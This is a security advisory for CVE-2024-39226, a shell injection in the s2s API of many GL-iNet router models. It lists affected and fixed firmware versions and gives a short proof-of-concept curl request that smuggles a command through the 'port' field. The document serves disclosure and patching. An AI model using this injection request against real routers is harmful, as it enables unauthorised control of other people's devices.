GL-iNet s2s interface shell injection（CVE-2024-39226）

s2s interface shell injection ============================= [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#s2s-interface-shell-injection) Description ----------- [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#description) This vulnerability can be exploited to manipulate routers by passing malicious shell commands through the s2s API. Affected Product ---------------- [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#affected-product) ● MT6000 /A1300 /X300B /AX1800 /AXT1800 /MT2500 /MT3000 /X3000 /XE3000 /XE300 /E750 /X750 /SFT1200 /AR300M /AR300M16 /AR750 /AR750S /B1300 /MT1300 /MT300N-V2 /AP1300 /B2200 /MV1000 /MV1000W /USB150 /SF1200 /N300 /S1300 Affected Firmware Version ------------------------- [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#affected-firmware-version) ● MT6000: 4.5.8, fixed in 4.6.2 ● A1300/X300B: 4.5.16, fixed in 4.5.17 ● AX1800/AXT1800/MT2500/MT3000: 4.5.16, fixed in 4.6.2 ● X3000/XE3000: 4.4.8, fixed in 4.4.9 ● XE300: 4.3.16, fixed in 4.3.17 ● E750: 4.3.12, fixed in 4.3.17 ● X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2: 4.3.11, fixed in 4.3.17 ● AP1300: 3.217, fixed in 3.218 ● B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216, fixed in 3.218 Exploit ------- [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#exploit) By invoking the interface of s2s, arbitrary shell commands can be executed to manipulate the router. curl -H 'glinet: 1' 127.0.0.1/rpc -d '{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch /root/test)"}]}' Impact ------ [](https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md#impact) Attackers can send malicious instructions through this vulnerability to manipulate routers.